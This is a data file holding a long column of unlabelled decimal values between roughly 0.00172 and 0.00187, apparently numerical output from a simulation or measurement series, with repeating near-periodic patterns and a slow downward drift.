0.0018368
0.00183251
0.00183682
0.00183242
0.00183681
0.00183678
0.00183246
0.0018368
0.00183252
0.00183682
0.00183242
0.00183681
0.00183678
0.00183246
0.00184154
0.0018459
0.00184587
0.0018415
0.00184589
0.0018415
0.00184159
0.00184154
0.0018459
0.00184587
0.0018415
0.00184589
0.0018415
0.00184159
0.00183683
0.0018324
0.0018324
0.00183682
0.00183682
0.0018324
0.00185502
0.00185502
0.00185059
0.00185062
0.00185502
0.00185502
0.00185059
0.0018597
0.00186416
0.00185971
0.00186415
0.00185971
0.0018597
0.00185974
0.00186415
0.00186415
0.00185971
0.00186415
0.00185973
0.00185502
0.00185059
0.00185501
0.00185503
0.00185059
0.00184149
0.00184592
0.00184591
0.00184153
0.00184591
0.00184149
0.00184152
0.00183683
0.00183682
0.00183242
0.00183241
0.00183683
0.00184149
0.00184592
0.0018415
0.00184591
0.0018415
0.00183683
0.00183683
0.00183242
0.00183244
0.00183242
0.00183683
0.00183682
0.00184149
0.00184592
0.00184591
0.00184153
0.00184592
0.00184149
0.00184152
0.00183683
0.00183682
0.00183242
0.00183683
0.00183241
0.00184149
0.00184592
0.0018415
0.00184591
0.0018415
0.00183683
0.00183683
0.00183242
0.00183244
0.00183683
0.00183682
0.00183241
0.00185503
0.00185057
0.00185058
0.00185502
0.00185502
0.00185058
0.00185976
0.00186411
0.00186414
0.00185972
0.00185971
0.00186413
0.00185982
0.00185976
0.00186411
0.00186414
0.00185973
0.00185982
0.00186413
0.00185972
0.0018597
0.00186415
0.00186414
0.00185969
0.00186416
0.00185969
0.001855
0.0018506
0.00185502
0.0018507
0.00185501
0.00185498
0.00185064
0.001855
0.0018506
0.00185502
0.0018507
0.00185499
0.00185501
0.00185065
0.00185971
0.00185502
0.00183682
0.00184149
0.00184149
0.00184591
0.00184591
0.00184593
0.00184148
0.00184148
0.00183681
0.00183252
0.00183683
0.00183242
0.00183679
0.00183682
0.00183247
0.00183681
0.00183252
0.00183683
0.00183242
0.00183682
0.00183679
0.00183247
0.00184154
0.0018459
0.00184587
0.00184151
0.0018416
0.00184589
0.0018415
0.00184155
0.00184591
0.00184588
0.00184151
0.00184589
0.0018415
0.0018416
0.00183684
0.0018324
0.0018324
0.00183682
0.00183683
0.00183241
0.00183682
0.00184149
0.00185502
0.00185502
0.00185059
0.00185061
0.00185502
0.00185502
0.00185059
0.0018597
0.00186415
0.00185971
0.00186414
0.00185971
0.0018597
0.00185974
0.00186415
0.00186414
0.00185971
0.00186415
0.00185973
0.00185502
0.00185059
0.00185501
0.00185503
0.00185058
0.00184149
0.00184591
0.00184591
0.00184152
0.00184591
0.00184151
0.00184149
0.00183682
0.00183681
0.00183242
0.00183241
0.00183683
0.00184148
0.00184592
0.00184149
0.00184591
0.00184149
0.00183682
0.00183682
0.00183244
0.00183241
0.00183241
0.00183682
0.00183682
0.00184149
0.00184591
0.00184591
0.00184152
0.00184591
0.00184149
0.00184151
0.00183682
0.00183681
0.00183242
0.00183683
0.00183241
0.00184148
0.00184592
0.00184149
0.00184591
0.00184149
0.00183682
0.00183682
0.00183241
0.00183244
0.00183682
0.00183682
0.00183241
0.00185503
0.00185503
0.00185062
0.0018506
0.00185502
0.00185503
0.00185059
0.00185971
0.00186416
0.00185972
0.00185972
0.00186415
0.00185971
0.00185975
0.00186415
0.00186415
0.00185974
0.00186415
0.00185971
0.00185503
0.0018506
0.00185501
0.00185503
0.00185059
0.00185503
0.00185503
0.0018506
0.00185062
0.00185503
0.00185502
0.00185059
0.00185971
0.00186416
0.00185972
0.00186415
0.00185972
0.00185971
0.00185975
0.00186415
0.00186415
0.00186415
0.00185971
0.00185974
0.00185503
0.0018506
0.00185501
0.00185503
0.00185059
0.0018415
0.00184592
0.00184592
0.00184153
0.00184592
0.00184152
0.0018415
0.00183683
0.00183682
0.00183242
0.00183684
0.00183241
0.00184149
0.00184593
0.0018415
0.00184592
0.0018415
0.00183683
0.00183683
0.00183244
0.00183242
0.00183683
0.00183683
0.00183242
0.0018415
0.00184592
0.00184592
0.00184153
0.00184592
0.0018415
0.00184152
0.00183683
0.00183682
0.00183242
0.00183684
0.00183242
0.00184149
0.00184593
0.0018415
0.00184592
0.0018415
0.00183683
0.00183683
0.00183242
0.00183245
0.00183683
0.00183683
0.00183242
0.00185503
0.00185057
0.00185057
0.00185502
0.00185502
0.00185058
0.00185976
0.00186411
0.00186413
0.00185972
0.00185971
0.00186412
0.00185981
0.00185976
0.00186411
0.00186413
0.00185972
0.00185981
0.00186412
0.00185971
0.0018597
0.00186414
0.00186414
0.00185969
0.00186416
0.00185969
0.001855
0.0018506
0.00185502
0.00185069
0.00185501
0.00185498
0.00185064
0.001855
0.0018506
0.00185502
0.0018507
0.00185498
0.00185501
0.00185064
0.0018597
0.00185501
0.00183681
0.00184148
0.00184148
0.00184591
0.00184591
0.00184592
0.00184147
0.00184147
0.0018368
0.00183251
0.00183682
0.00183242
0.00183678
0.00183681
0.00183246
0.0018368
0.00183252
0.00183682
0.00183242
0.00183681
0.00183679
0.00183246
0.00184154
0.0018459
0.00184587
0.0018415
0.00184159
0.00184589
0.0018415
0.00184154
0.0018459
0.00184587
0.00184151
0.00184589
0.0018415
0.0018416
0.00183683
0.0018324
0.0018324
0.00183682
0.00183682
0.0018324
0.00183682
0.00184149
0.00185502
0.00185502
0.00185062
0.00185059
0.00185502
0.00185502
0.00185059
0.0018597
0.00186416
0.00185971
0.00185971
0.00186415
0.0018597
0.00185975
0.00186415
0.00186415
0.00185974
0.00186415
0.00185971
0.00185502
0.0018506
0.00185501
0.00185503
0.00185059
0.00185502
0.00185502
0.00185062
0.00185059
0.00185502
0.00185502
0.00185059
0.00185971
0.00186416
0.00185972
0.00186415
0.00185972
0.00185971
0.00185975
0.00186415
0.00186415
0.00186415
0.00185974
0.00185971
0.00185502
0.0018506
0.00185501
0.00185503
0.00185059
0.00184149
0.00184591
0.00184592
0.00184153
0.00184592
0.00184152
0.0018415
0.00183683
0.00183681
0.00183242
0.00183683
0.00183241
0.00184149
0.00184592
0.0018415
0.00184591
0.0018415
0.00183683
0.00183683
0.00183244
0.00183242
0.00183682
0.00183683
0.00183241
0.00184149
0.00184592
0.00184592
0.00184153
0.00184592
0.00184152
0.0018415
0.00183683
0.00183682
0.00183242
0.00183684
0.00183241
0.00184149
0.00184593
0.0018415
0.00184592
0.0018415
0.00183683
0.00183683
0.00183244
0.00183242
0.00183683
0.00183683
0.00183242
0.00185971
0.00185502
0.00185971
0.00185502
0.00184149
0.00184592
0.00184592
0.00184593
0.00184148
0.00184148
0.00183681
0.00183252
0.00183683
0.00183242
0.00183247
0.00183679
0.00183682
0.00183681
0.00183252
0.00183683
0.00183242
0.00183247
0.00183679
0.00183682
0.00184155
0.00184591
0.00184588
0.00184151
0.0018459
0.0018416
0.0018415
0.00184155
0.00184591
0.00184588
0.00184151
0.0018459
0.0018416
0.0018415
0.00183684
0.0018324
0.0018324
0.00183241
0.00183683
0.00183683
0.00183682
0.00184149
0.00183682
0.00184149
0.00182335
0.00181871
0.00182335
0.0018187
0.00181872
0.00181431
0.00181431
0.00181871
0.00181871
0.00181431
0.0018234
0.00182772
0.00182775
0.00182337
0.00182773
0.00182336
0.00182346
0.0018234
0.00182772
0.00182775
0.00182337
0.00182773
0.00182336
0.00182346
0.00182335
0.00182776
0.00182776
0.00182777
0.00182334
0.00182334
0.00181869
0.00181433
0.00181871
0.00181442
0.0018187
0.00181437
0.00181867
0.00181869
0.00181433
0.00181871
0.00181442
0.0018187
0.00181437
0.00181867
0.00180067
0.0018053
0.00180067
0.0018053
0.00180529
0.00180968
0.00180968
0.00180969
0.00180529
0.00180529
0.00180065
0.00179639
0.00180067
0.0017963
0.00180066
0.00180063
0.00179634
0.00180065
0.00179639
0.00180067
0.0017963
0.00180066
0.00180063
0.00179634
0.00180535
0.00180967
0.00180964
0.00180531
0.00180966
0.00180531
0.00180539
0.00180535
0.00180967
0.00180964
0.00180531
0.00180966
0.00180531
0.0018054
0.00180068
0.00179628
0.00179628
0.00180067
0.00180067
0.00179629
0.00181871
0.00181871
0.00181432
0.00181434
0.00181871
0.00181871
0.00181432
0.00182336
0.00182777
0.00182336
0.00182776
0.00182336
0.00182336
0.00182339
0.00182777
0.00182776
0.00182336
0.00182776
0.00182338
0.00181871
0.00181432
0.0018187
0.00181872
0.00181432
0.0018053
0.00180969
0.00180968
0.00180533
0.00180969
0.0018053
0.00180532
0.00180068
0.00180066
0.0017963
0.0017963
0.00180068
0.0018053
0.00180969
0.00180531
0.00180969
0.0018053
0.00180068
0.00180067
0.0017963
0.00179632
0.0017963
0.00180068
0.00180067
0.0018053
0.00180969
0.00180968
0.00180533
0.00180969
0.0018053
0.00180532
0.00180068
0.00180066
0.0017963
0.00180068
0.0017963
0.0018053
0.00180969
0.0018053
0.00180969
0.0018053
0.00180068
0.00180067
0.0017963
0.00179632
0.00180068
0.00180067
0.0017963
0.00181872
0.0018143
0.0018143
0.00181871
0.00181871
0.00181431
0.00182341
0.00182772
0.00182775
0.00182337
0.00182336
0.00182774
0.00182346
0.00182341
0.00182772
0.00182775
0.00182337
0.00182346
0.00182774
0.00182337
0.00182335
0.00182776
0.00182776
0.00182334
0.00182777
0.00182334
0.00181869
0.00181433
0.00181871
0.00181442
0.0018187
0.00181867
0.00181437
0.00181869
0.00181433
0.00181871
0.00181442
0.00181867
0.0018187
0.00181437
0.00182336
0.00181871
0.00180067
0.0018053
0.00180529
0.00180968
0.00180968
0.00180969
0.00180528
0.00180528
0.00180065
0.00179639
0.00180067
0.0017963
0.00180063
0.00180066
0.00179634
0.00180065
0.00179639
0.00180067
0.0017963
0.00180066
0.00180063
0.00179634
0.00180534
0.00180967
0.00180964
0.00180531
0.00180539
0.00180966
0.0018053
0.00180534
0.00180967
0.00180963
0.00180531
0.00180966
0.0018053
0.00180539
0.00180068
0.00179628
0.00179628
0.00180067
0.00180067
0.00179629
0.00180066
0.00180529
0.00181871
0.0018187
0.00181432
0.00181434
0.00181871
0.0018187
0.00181431
0.00182335
0.00182776
0.00182336
0.00182776
0.00182336
0.00182335
0.00182339
0.00182776
0.00182775
0.00182335
0.00182776
0.00182338
0.00181871
0.00181432
0.0018187
0.00181871
0.00181431
0.0018053
0.00180968
0.00180968
0.00180533
0.00180968
0.00180532
0.0018053
0.00180067
0.00180066
0.0017963
0.00179629
0.00180068
0.0018053
0.00180969
0.00180531
0.00180968
0.0018053
0.00180067
0.00180067
0.00179632
0.0017963
0.00179629
0.00180066
0.00180067
0.00180529
0.00180968
0.00180968
0.00180533
0.00180968
0.0018053
0.00180532
0.00180067
0.00180066
0.0017963
0.00180067
0.00179629
0.00180529
0.00180969
0.0018053
0.00180968
0.0018053
0.00180067
0.00180067
0.0017963
0.00179632
0.00180067
0.00180066
0.00179629
0.00181871
0.00181871
0.00181434
0.00181432
0.00181871
0.00181871
0.00181432
0.00182335
0.00182777
0.00182337
0.00182336
0.00182776
0.00182336
0.00182339
0.00182776
0.00182777
0.00182338
0.00182776
0.00182336
0.00181871
0.00181432
0.0018187
0.00181872
0.00181432
0.00181871
0.00181871
0.00181432
0.00181434
0.00181872
0.00181871
0.00181432
0.00182336
0.00182777
0.00182337
0.00182776
0.00182336
0.00182336
0.00182339
0.00182777
0.00182776
0.00182777
0.00182336
0.00182338
0.00181871
0.00181432
0.0018187
0.00181872
0.00181432
0.00180529
0.00180968
0.00180969
0.00180533
0.00180968
0.00180532
0.0018053
0.00180067
0.00180066
0.0017963
0.00180068
0.00179629
0.00180529
0.00180969
0.0018053
0.00180968
0.0018053
0.00180067
0.00180066
0.00179632
0.0017963
0.00180066
0.00180067
0.00179629
0.00180529
0.00180969
0.00180968
0.00180533
0.00180968
0.0018053
0.00180532
0.00180067
0.00180066
0.0017963
0.00180067
0.00179629
0.00180529
0.00180969
0.0018053
0.00180968
0.0018053
0.00180067
0.00180066
0.0017963
0.00179632
0.00180067
0.00180066
0.00179629
0.00181872
0.0018143
0.0018143
0.00181871
0.00181871
0.00181431
0.0018234
0.00182771
0.00182774
0.00182337
0.00182336
0.00182773
0.00182345
0.0018234
0.00182772
0.00182775
0.00182337
0.00182346
0.00182773
0.00182336
0.00182334
0.00182775
0.00182775
0.00182334
0.00182777
0.00182334
0.00181868
0.00181432
0.00181871
0.00181441
0.0018187
0.00181866
0.00181436
0.00181868
0.00181432
0.00181871
0.00181441
0.00181867
0.0018187
0.00181436
0.00182335
0.0018187
0.00180066
0.00180529
0.00180529
0.00180968
0.00180968
0.00180969
0.00180528
0.00180528
0.00180064
0.00179639
0.00180067
0.0017963
0.00180062
0.00180066
0.00179634
0.00180064
0.00179639
0.00180066
0.0017963
0.00180066
0.00180062
0.00179634
0.00180534
0.00180967
0.00180964
0.00180531
0.00180539
0.00180965
0.0018053
0.00180534
0.00180967
0.00180963
0.0018053
0.00180965
0.0018053
0.00180539
0.00180068
0.00179628
0.00179628
0.00180067
0.00180067
0.00179628
0.00180066
0.00180529
0.00181871
0.00181871
0.00181434
0.00181432
0.00181871
0.00181871
0.00181432
0.00182335
0.00182777
0.00182336
0.00182336
0.00182776
0.00182335
0.00182339
0.00182776
0.00182776
0.00182338
0.00182776
0.00182336
0.00181871
0.00181432
0.0018187
0.00181871
0.00181431
0.00181871
0.00181871
0.00181434
0.00181432
0.00181871
0.00181871
0.00181432
0.00182335
0.00182777
0.00182336
0.00182776
0.00182336
0.00182335
0.00182339
0.00182776
0.00182776
0.00182776
0.00182338
0.00182336
0.00181871
0.00181432
0.0018187
0.00181872
0.00181432
0.00180529
0.00180968
0.00180968
0.00180533
0.00180968
0.00180532
0.0018053
0.00180067
0.00180066
0.00179629
0.00180067
0.00179629
0.00180529
0.00180969
0.0018053
0.00180968
0.0018053
0.00180067
0.00180066
0.00179631
0.0017963
0.00180066
0.00180067
0.00179629
0.0018053
0.00180968
0.00180969
0.00180533
0.00180968
0.00180532
0.0018053
0.00180067
0.00180066
0.0017963
0.00180068
0.00179629
0.0018053
0.00180969
0.0018053
0.00180969
0.0018053
0.00180067
0.00180067
0.00179632
0.0017963
0.00180066
0.00180067
0.00179629
0.00182336
0.00181871
0.00182336
0.00181871
0.00180529
0.00180968
0.00180968
0.00180969
0.00180528
0.00180528
0.00180064
0.00179639
0.00180067
0.0017963
0.00179634
0.00180062
0.00180066
0.00180064
0.00179639
0.00180067
0.0017963
0.00179634
0.00180063
0.00180066
0.00180534
0.00180967
0.00180964
0.00180531
0.00180966
0.00180539
0.0018053
0.00180534
0.00180967
0.00180964
0.00180531
0.00180966
0.00180539
0.0018053
0.00180068
0.00179628
0.00179628
0.00179628
0.00180067
0.00180067
0.00180066
0.00180529
0.00180066
0.00180529
0.00178731
0.0017827
0.00178731
0.0017827
0.00178271
0.00177834
0.00177833
0.00178271
0.00178271
0.00177834
0.00178736
0.00179163
0.00179167
0.00178732
0.00179165
0.00178732
0.00178741
0.00178736
0.00179163
0.00179167
0.00178732
0.00179165
0.00178732
0.00178741
0.0017873
0.00179168
0.00179168
0.00179169
0.0017873
0.0017873
0.00178268
0.00177835
0.0017827
0.00177844
0.00178269
0.00177839
0.00178266
0.00178268
0.00177835
0.0017827
0.00177844
0.00178269
0.00177839
0.00178266
0.0017648
0.00176939
0.00176479
0.00176939
0.00176938
0.00177375
0.00177375
0.00177376
0.00176938
0.00176938
0.00176477
0.00176055
0.0017648
0.00176046
0.00176479
0.00176475
0.0017605
0.00176477
0.00176054
0.0017648
0.00176046
0.00176479
0.00176475
0.0017605
0.00176944
0.00177374
0.00177369
0.0017694
0.00177372
0.0017694
0.00176948
0.00176944
0.00177374
0.00177369
0.0017694
0.00177372
0.0017694
0.00176948
0.00176481
0.00176045
0.00176045
0.0017648
0.0017648
0.00176045
0.00178271
0.0017827
0.00177835
0.00177837
0.00178271
0.0017827
0.00177834
0.00178731
0.00179169
0.00178732
0.00179168
0.00178731
0.00178731
0.00178734
0.00179168
0.00179167
0.00178731
0.00179168
0.00178733
0.00178271
0.00177835
0.00178269
0.00178271
0.00177834
0.00176939
0.00177375
0.00177374
0.00176942
0.00177375
0.00176939
0.00176941
0.0017648
0.00176479
0.00176046
0.00176045
0.00176481
0.00176939
0.00177375
0.0017694
0.00177375
0.00176939
0.0017648
0.00176479
0.00176046
0.00176048
0.00176046
0.0017648
0.00176479
0.00176939
0.00177375
0.00177374
0.00176942
0.00177375
0.00176939
0.00176941
0.0017648
0.00176479
0.00176046
0.00176481
0.00176045
0.00176939
0.00177375
0.0017694
0.00177375
0.00176939
0.0017648
0.00176479
0.00176046
0.00176047
0.0017648
0.00176479
0.00176045
0.00178271
0.00177833
0.00177833
0.0017827
0.0017827
0.00177834
0.00178736
0.00179163
0.00179167
0.00178732
0.00178732
0.00179165
0.00178741
0.00178736
0.00179163
0.00179167
0.00178732
0.00178741
0.00179165
0.00178732
0.0017873
0.00179168
0.00179168
0.0017873
0.00179169
0.0017873
0.00178268
0.00177835
0.0017827
0.00177843
0.00178269
0.00178266
0.00177839
0.00178268
0.00177835
0.0017827
0.00177844
0.00178266
0.00178269
0.00177839
0.00178731
0.0017827
0.0017648
0.00176939
0.00176938
0.00177375
0.00177375
0.00177375
0.00176938
0.00176938
0.00176478
0.00176055
0.0017648
0.00176046
0.00176475
0.00176479
0.0017605
0.00176477
0.00176054
0.0017648
0.00176046
0.00176479
0.00176475
0.0017605
0.00176944
0.00177373
0.00177369
0.0017694
0.00176948
0.00177372
0.0017694
0.00176944
0.00177373
0.0017737
0.0017694
0.00177372
0.0017694
0.00176948
0.00176481
0.00176045
0.00176044
0.0017648
0.0017648
0.00176045
0.00176479
0.00176939
0.0017827
0.0017827
0.00177834
0.00177836
0.0017827
0.00178269
0.00177834
0.00178731
0.00179168
0.00178732
0.00179168
0.00178731
0.00178731
0.00178734
0.00179168
0.00179167
0.00178731
0.00179168
0.00178733
0.0017827
0.00177834
0.00178269
0.0017827
0.00177834
0.00176939
0.00177374
0.00177375
0.00176942
0.00177375
0.00176941
0.00176939
0.0017648
0.00176479
0.00176046
0.00176045
0.0017648
0.00176939
0.00177375
0.0017694
0.00177375
0.00176939
0.0017648
0.00176479
0.00176047
0.00176046
0.00176045
0.00176479
0.0017648
0.00176939
0.00177374
0.00177373
0.00176942
0.00177374
0.00176939
0.00176941
0.0017648
0.00176479
0.00176046
0.0017648
0.00176045
0.00176939
0.00177375
0.0017694
0.00177374
0.00176939
0.0017648
0.00176479
0.00176046
0.00176048
0.0017648
0.00176479
0.00176045
0.0017827
0.0017827
0.00177836
0.00177834
0.00178269
0.0017827
0.00177834
0.00178731
0.00179168
0.00178732
0.00178731
0.00179168
0.00178731
0.00178734
0.00179167
0.00179168
0.00178733
0.00179168
0.00178731
0.0017827
0.00177834
0.00178269
0.00178271
0.00177834
0.0017827
0.00178269
0.00177834
0.00177836
0.0017827
0.00178269
0.00177834
0.00178731
0.00179168
0.00178731
0.00179168
0.00178731
0.00178731
0.00178734
0.00179168
0.00179167
0.00179168
0.00178731
0.00178733
0.0017827
0.00177834
0.00178269
0.0017827
0.00177834
0.00176939
0.00177373
0.00177374
0.00176942
0.00177374
0.00176941
0.00176939
0.0017648
0.00176479
0.00176045
0.0017648
0.00176045
0.00176939
0.00177375
0.0017694
0.00177374
0.00176939
0.0017648
0.00176479
0.00176047
0.00176045
0.00176479
0.0017648
0.00176045
0.00176939
0.00177374
0.00177373
0.00176942
0.00177374
0.00176939
0.00176941
0.0017648
0.00176479
0.00176045
0.0017648
0.00176045
0.00176939
0.00177375
0.00176939
0.00177374
0.00176939
0.0017648
0.00176479
0.00176045
0.00176047
0.0017648
0.00176479
0.00176045
0.00178271
0.00177833
0.00177833
0.0017827
0.0017827
0.00177833
0.00178735
0.00179163
0.00179167
0.00178732
0.00178732
0.00179165
0.0017874
0.00178735
0.00179163
0.00179166
0.00178732
0.0017874
0.00179165
0.00178732
0.0017873
0.00179168
0.00179167
0.0017873
0.00179168
0.0017873
0.00178267
0.00177835
0.0017827
0.00177843
0.00178269
0.00178265
0.00177839
0.00178267
0.00177835
0.0017827
0.00177843
0.00178265
0.00178269
0.00177839
0.00178731
0.00178269
0.00176479
0.00176939
0.00176938
0.00177374
0.00177374
0.00177375
0.00176938
0.00176938
0.00176477
0.00176055
0.0017648
0.00176046
0.00176475
0.00176479
0.0017605
0.00176477
0.00176054
0.00176479
0.00176046
0.00176479
0.00176475
0.0017605
0.00176943
0.00177373
0.00177369
0.0017694
0.00176948
0.00177371
0.0017694
0.00176943
0.00177373
0.00177369
0.0017694
0.00177371
0.0017694
0.00176948
0.00176481
0.00176044
0.00176044
0.0017648
0.0017648
0.00176044
0.00176479
0.00176939
0.0017827
0.00178269
0.00177836
0.00177834
0.00178269
0.0017827
0.00177834
0.0017873
0.00179168
0.00178731
0.00178731
0.00179168
0.0017873
0.00178734
0.00179167
0.00179168
0.00178733
0.00179168
0.00178731
0.0017827
0.00177834
0.00178269
0.0017827
0.00177834
0.0017827
0.00178269
0.00177836
0.00177834
0.00178269
0.0017827
0.00177834
0.00178731
0.00179168
0.00178731
0.00179168
0.00178731
0.0017873
0.00178734
0.00179167
0.00179168
0.00179168
0.00178733
0.00178731
0.0017827
0.00177834
0.00178269
0.0017827
0.00177834
0.00176938
0.00177373
0.00177374
0.00176941
0.00177374
0.00176941
0.00176939
0.0017648
0.00176479
0.00176045
0.0017648
0.00176045
0.00176938
0.00177374
0.00176939
0.00177374
0.00176939
0.0017648
0.00176479
0.00176047
0.00176045
0.00176479
0.0017648
0.00176045
0.00176938
0.00177373
0.00177374
0.00176941
0.00177374
0.0017694
0.00176939
0.0017648
0.00176478
0.00176045
0.0017648
0.00176045
0.00176938
0.00177374
0.00176939
0.00177374
0.00176939
0.00176479
0.00176478
0.00176047
0.00176045
0.00176478
0.00176479
0.00176045
0.00178731
0.00178269
0.0017873
0.00178269
0.00176938
0.00177374
0.00177374
0.00177375
0.00176937
0.00176937
0.00176477
0.00176054
0.00176479
0.00176046
0.00176049
0.00176475
0.00176478
0.00176477
0.00176054
0.00176479
0.00176046
0.00176049
0.00176474
0.00176478
0.00176943
0.00177373
0.00177369
0.0017694
0.00177371
0.00176948
0.00176939
0.00176943
0.00177373
0.00177369
0.0017694
0.00177371
0.00176948
0.00176939
0.0017648
0.00176044
0.00176044
0.00176044
0.00176479
0.00176479
0.00176479
0.00176939
0.00176479
0.00176938
0.00175153
0.00174695
0.00175153
0.00174695
0.00174696
0.00174261
0.00174261
0.00174696
0.00174696
0.00174261
0.00175158
0.00175582
0.00175586
0.00175154
0.00175584
0.00175154
0.00175162
0.00175158
0.00175582
0.00175586
0.00175154
0.00175584
0.00175154
0.00175162
0.00175152
0.00175587
0.00175587
0.00175588
0.00175152
0.00175152
0.00174693
0.00174263
0.00174695
0.00174271
0.00174695
0.00174266
0.00174691
0.00174693
0.00174263
0.00174695
0.00174271
0.00174695
0.00174266
0.0017469
0.00172916
0.00173373
0.00172916
0.00173373
0.00173372
0.00173805
0.00173806
0.00173806
0.00173372
0.00173372
0.00172914
0.00172493
0.00172916
0.00172485
0.00172915
0.00172912
0.00172489
0.00172914
0.00172493
0.00172916
0.00172485
0.00172915
0.00172911
0.00172489
0.00173377
0.00173804
0.001738
0.00173373
0.00173802
0.00173373
0.00173382
0.00173377
0.00173804
0.001738
0.00173374
0.00173802
0.00173374
0.00173381
0.00172917
0.00172484
0.00172484
0.00172917
0.00172917
0.00172484
0.00174696
0.00174694
0.00174262
0.00174264
0.00174696
0.00174694
0.00174262
0.00175153
0.00175588
0.00175154
0.00175587
0.00175153
0.00175153
0.00175156
0.00175587
0.00175586
0.00175153
0.00175587
0.00175155
0.00174696
0.00174262
0.00174695
0.00174696
0.00174262
0.00173372
0.00173805
0.00173804
0.00173375
0.00173805
0.00173373
0.00173374
0.00172917
0.00172915
0.00172484
0.00172484
0.00172917
0.00173372
0.00173805
0.00173373
0.00173805
0.00173373
0.00172917
0.00172915
0.00172484
0.00172486
0.00172484
0.00172916
0.00172915
0.00173372
0.00173805
0.00173804
0.00173375
0.00173805
0.00173373
0.00173374
0.00172916
0.00172915
0.00172484
0.00172916
0.00172484
0.00173372
0.00173805
0.00173373
0.00173805
0.00173372
0.00172916
0.00172915
0.00172484
0.00172486
0.00172916
0.00172915
0.00172484
0.00174696
0.00174261
0.00174261
0.00174696
0.00174695
0.00174261
0.00175158
0.00175582
0.00175586
0.00175154
0.00175154
0.00175584
0.00175162
0.00175157
0.00175582
0.00175586
0.00175154
0.00175162
0.00175584
0.00175154
0.00175152
0.00175587
0.00175587
0.00175152
0.00175588
0.00175152
0.00174693
0.00174263
0.00174695
0.00174271
0.00174695
0.0017469
0.00174266
0.00174692
0.00174263
0.00174695
0.00174271
0.0017469
0.00174694
0.00174266
0.00175153
0.00174694
0.00172916
0.00173372
0.00173372
0.00173805
0.00173805
0.00173806
0.00173372
0.00173371
0.00172913
0.00172493
0.00172916
0.00172485
0.00172911
0.00172915
0.00172488
0.00172913
0.00172492
0.00172915
0.00172485
0.00172915
0.00172911
0.00172488
0.00173377
0.00173804
0.00173799
0.00173373
0.00173381
0.00173802
0.00173373
0.00173377
0.00173804
0.001738
0.00173373
0.00173802
0.00173373
0.00173381
0.00172917
0.00172483
0.00172483
0.00172916
0.00172916
0.00172483
0.00172915
0.00173372
0.00174696
0.00174695
0.00174263
0.00174264
0.00174696
0.00174695
0.00174262
0.00175153
0.00175587
0.00175154
0.00175587
0.00175153
0.00175153
0.00175156
0.00175587
0.00175586
0.00175153
0.00175587
0.00175155
0.00174696
0.00174263
0.00174695
0.00174696
0.00174262
0.00173373
0.00173804
0.00173805
0.00173375
0.00173805
0.00173375
0.00173373
0.00172917
0.00172915
0.00172484
0.00172484
0.00172917
0.00173373
0.00173806
0.00173373
0.00173806
0.00173373
0.00172917
0.00172916
0.00172486
0.00172485
0.00172484
0.00172916
0.00172917
0.00173373
0.00173806
0.00173804
0.00173375
0.00173806
0.00173373
0.00173375
0.00172917
0.00172916
0.00172485
0.00172917
0.00172485
0.00173373
0.00173806
0.00173374
0.00173806
0.00173373
0.00172917
0.00172916
0.00172485
0.00172487
0.00172917
0.00172916
0.00172485
0.00174695
0.00174694
0.00174264
0.00174262
0.00174694
0.00174695
0.00174262
0.00175152
0.00175587
0.00175153
0.00175153
0.00175587
0.00175152
0.00175155
0.00175586
0.00175587
0.00175155
0.00175587
0.00175153
0.00174695
0.00174262
0.00174694
0.00174695
0.00174262
0.00174695
0.00174694
0.00174262
0.00174263
0.00174695
0.00174694
0.00174261
0.00175153
0.00175587
0.00175153
0.00175587
0.00175153
0.00175152
0.00175155
0.00175587
0.00175586
0.00175587
0.00175153
0.00175154
0.00174695
0.00174262
0.00174694
0.00174695
0.00174262
0.00173372
0.00173803
0.00173805
0.00173375
0.00173805
0.00173374
0.00173372
0.00172916
0.00172915
0.00172484
0.00172916
0.00172484
0.00173372
0.00173805
0.00173373
0.00173805
0.00173372
0.00172916
0.00172915
0.00172486
0.00172484
0.00172915
0.00172916
0.00172484
0.00173372
0.00173805
0.00173803
0.00173375
0.00173805
0.00173372
0.00173374
0.00172916
0.00172915
0.00172484
0.00172916
0.00172484
0.00173372
0.00173805
0.00173373
0.00173805
0.00173372
0.00172916
0.00172915
0.00172484
0.00172486
0.00172916
0.00172915
0.00172484
0.00174696
0.00174262
0.00174262
0.00174696
0.00174696
0.00174262
0.00175158
0.00175582
0.00175586
0.00175154
0.00175154
0.00175584
0.00175162
0.00175158
0.00175582
0.00175586
0.00175154
0.00175162
0.00175584
0.00175154
0.00175152
0.00175587
0.00175587
0.00175152
0.00175588
0.00175152
0.00174693
0.00174263
0.00174695
0.00174271
0.00174695
0.0017469
0.00174267
0.00174693
0.00174263
0.00174695
0.00174271
0.0017469
0.00174695
0.00174267
0.00175153
0.00174695
0.00172916
0.00173373
0.00173372
0.00173806
0.00173806
0.00173806
0.00173372
0.00173372
0.00172914
0.00172493
0.00172916
0.00172486
0.00172911
0.00172916
0.00172489
0.00172914
0.00172493
0.00172916
0.00172485
0.00172916
0.00172911
0.00172489
0.00173377
0.00173805
0.001738
0.00173374
0.00173382
0.00173803
0.00173374
0.00173377
0.00173805
0.001738
0.00173374
0.00173803
0.00173374
0.00173382
0.00172917
0.00172484
0.00172484
0.00172917
0.00172917
0.00172484
0.00172916
0.00173373
0.00174695
0.00174694
0.00174264
0.00174262
0.00174694
0.00174695
0.00174262
0.00175153
0.00175587
0.00175154
0.00175153
0.00175587
0.00175153
0.00175155
0.00175586
0.00175587
0.00175155
0.00175587
0.00175153
0.00174695
0.00174262
0.00174694
0.00174696
0.00174262
0.00174695
0.00174694
0.00174264
0.00174262
0.00174694
0.00174695
0.00174262
0.00175153
0.00175587
0.00175153
0.00175587
0.00175153
0.00175153
0.00175155
0.00175586
0.00175587
0.00175587
0.00175155
0.00175153
0.00174695
0.00174262
0.00174694
0.00174695
0.00174262
0.00173372
0.00173804
0.00173805
0.00173375
0.00173805
0.00173374
0.00173372
0.00172916
0.00172915
0.00172484
0.00172917
0.00172484
0.00173372
0.00173805
0.00173373
0.00173805
0.00173373
0.00172916
0.00172915
0.00172486
0.00172484
0.00172915
0.00172916
0.00172484
0.00173372
0.00173804
0.00173805
0.00173375
0.00173805
0.00173374
0.00173372
0.00172916
0.00172915
0.00172484
0.00172916
0.00172484
0.00173372
0.00173805
0.00173373
0.00173805
0.00173372
0.00172916
0.00172915
0.00172485
0.00172484
0.00172915
0.00172916
0.00172484
0.00175153
0.00174694
0.00175153
0.00174695
0.00173371
0.00173805
0.00173805
0.00173806
0.00173371
0.00173371
0.00172913
0.00172492
0.00172915
0.00172485
0.00172488
0.00172911
0.00172915
0.00172913
0.00172493
0.00172916
0.00172485
0.00172488
0.00172911
0.00172915
0.00173376
0.00173804
0.00173799
